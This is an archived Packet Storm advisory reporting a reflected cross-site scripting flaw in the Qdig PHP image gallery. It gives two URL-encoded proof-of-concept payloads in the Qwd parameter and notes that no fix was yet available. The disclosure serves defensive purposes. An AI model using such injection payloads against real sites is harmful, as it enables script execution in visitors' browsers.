qdig-xss.txt

2007-02-13T00:00:00
ID PACKETSTORM:54353
Type packetstorm
Reporter Andrea Purificato
Modified 2007-02-13T00:00:00

Description

                                        
                                            `Qdig - Quick Digital Image Gallery - http://qdig.sourceforge.net/)  
  
Version affected: qdig-1.2.9.3, qdig-devel-20060624   
  
Risk: XSS  
  
Description:  
Qdig is an easy-to-use PHP script that dynamically presents your digital image   
files as an online gallery or set of galleries.  
  
Vulnerability:  
It's vulnerable to XSS (Cross Site Scripting) attack,  
examples:  
- /?Qwd=\0%22%3Cbody%20onload=alert(String.fromCharCode(88,83,83))%3E   
- /?Qwd=\0%22%3Cbody%20onload=document.write(navigator.userAgent);%3E   
  
Solution:  
No solution until author answer.  
  
Credits:   
Andrea "bunker" Purificato - http://rawlab.mindcreations.com  
  
  
Mail copied to the author: haganafox AT sf (no other email found)  
--   
Andrea "bunker" Purificato  
+++++++++++[>++++++>+++++++++++++++++++++++++++++++++>++++  
++++++<<<-]>.>++++++++++.>.<----------.>---------.<+++++++.  
  
http://rawlab.mindcreations.com   
`